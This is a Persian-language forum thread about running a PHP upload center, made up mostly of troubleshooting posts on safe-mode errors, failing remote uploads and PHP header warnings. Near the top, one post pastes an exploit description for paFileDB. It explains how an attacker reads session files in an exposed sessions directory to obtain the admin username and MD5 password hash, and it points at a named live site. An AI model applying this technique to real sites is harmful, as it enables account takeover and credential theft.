دوست عزيز اينجا http://upload.bazidot.com/ خودت هم مي دوني سيستم قابل هك شدن هست چرا مطرح نكردي؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
در حالي كه در سايت خودت admin.php رو delet كرده اي...!!!
------------------------------------------------------------------------------
روش اكسپلويت به اين سيستم
کد:
admin (dudul) log in to manage the site at
http://URL/pafiledb/pafiledb.php?action=admin ,then the session is recorded in
sessions directory
+ attacker access the directory directly and see the "sessions" (in a same time)
Exploit: http://URL/pafiledb/sessions/[sessionfile]
then access the listing sessions file
example : 'sess_12c9d926184e836451a15ed837bb875d'
which is contain
user|s:5:"dudul";pass|s:32:"810f9f3fbad17446a22ed2e516a12c36";
ip|s:32:"f528764d624db129b32c21fbca0cb8d6";
---- info that attacker get ----
user : dudul
pass : 810f9f3fbad17446a22ed2e516a12c36 <-- MD5
اگه تاپيك رو اشتباهي نوشته باشم معذرت مي خوام چون وقتي آنلاين مي شم با عجله مي آم و مطالب رو مي نويسم چون زياد وقت نمي كنم آنلاين بمونم
اما منظورم اين بود >>> كه خودم هم استفاده مي كردم
کد:
#paFileDB 3.0 Language File
#Persian
#Translated by Mehdi Keramati ([email protected]).
اكه محل تاپيك اشتباه شده انتغال بدين ممنونم ... باز هم مي آم
فكر مي كنم اگر با Notepad فايل ها را ويرايش و ذخيره كنيد با چنين مشكلي مواجه نخواهيد شد.
در هر صورت اگر مشكل كماكان باقي بود فايل هايي را كه تغيير داديد ضميمه كنيد تا مشكل شما را برطرف كنم
دوستان پس از 1 روز كار كردن الان زمان اتمام آپلود ايراد ميگيره و پس از ورود به هر شاخه
ايراد ميگيره
Warning: filesize(): SAFE MODE Restriction in effect. The script whose uid is 32176 is not allowed to access files/Primum X/7100PGU_ME owned by uid 99 in /home/iran/public_html/upload/include/functions.php on line 155
- www.iraniansatellite.net/upload
سلام دوستان
من به يك مشكل بر خوردم
در قسمت
آپلود فايل با استفاده از لينك
وقتي كه من لينك دانلود رو ميدم و بعد مي زنم ارسال هيچ تغييري صورت نمي گيره و فايل هم دانلود نمي شه
من رفتم و نسخه انگليسيشم نصب كردم ولي اون نسخه هم مشكل داشت
وقتي لينك رو ميدم بعد ارسال فايل رو ميزنم
يك فايل به ليست فايل ها اضافه مي شه ولي همشون
فقط 2 يا 3 كيلو بايت هستند!! يعني اصلا فايل رو دانلود نمي كنه!
سلام دوستان
ali_civil جان اين آپلود سنتر paFileDB نيست كه با اون اكسپلوييتت هايي كه داديد هك بشه ... اين سيستم اسمش PHP Advanced Transfer Manager است ...
Hyper جان تا زماني كه فايل هايي را كه تغيير داديد براي من ارسال نكنيد نمي توانم به شما بگويم كه ايراد كارتان از كجاست ....
amin2779 جان تنظيمات مربوط به SafeMode فايل php.ini شما active است به همين دليل مشكل داريد ... براي رفع اين مسله فكر مي كنم بايد با مسولين هاستينگ خود تماس بگيريد.
sky_man دوست عزيز بنده اين مورد را بررسي مي كنم ... در صورتي كه راه حلي يافتم همينجا اطلاع خواهم داد.
sky_man
تا جايي كه بنده تحقيق كردم براي اينكه اين گزينه درست كار كند نياز به تنظيم Maximum allowed filesize to upload از فايل conf.php و يا تنظيم آن از php.ini ( در صورت دسترسي ) داريد...
[align=left:bb4c3886ff]Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /home/pptforum/public_html/up/index.php:1) in /home/pptforum/public_html/up/include/common.php on line 62
Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/pptforum/public_html/up/index.php:1) in /home/pptforum/public_html/up/include/common.php on line 62
Warning: Cannot modify header information - headers already sent by (output started at /home/pptforum/public_html/up/index.php:1) in /home/pptforum/public_html/up/include/common.php on line 97
Warning: Cannot modify header information - headers already sent by (output started at /home/pptforum/public_html/up/index.php:1) in /home/pptforum/public_html/up/include/common.php on line 98
Warning: Cannot modify header information - headers already sent by (output started at /home/pptforum/public_html/up/index.php:1) in /home/pptforum/public_html/up/include/common.php on line 99
Warning: Cannot modify header information - headers already sent by (output started at /home/pptforum/public_html/up/index.php:1) in /home/pptforum/public_html/up/include/common.php on line 100[/align:bb4c3886ff]
اين خط 62 :
[align=left:bb4c3886ff]// Registro la sessione o recupero quella attiva
session_start();[/align:bb4c3886ff]
اين هم خطوط بعدي ( 97 تا 100 ) :
[align=left:bb4c3886ff]// Le pagine non devono rimanere in cache..
header("Expires: Mon, 03 Jan 2000 00:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");[/align:bb4c3886ff]
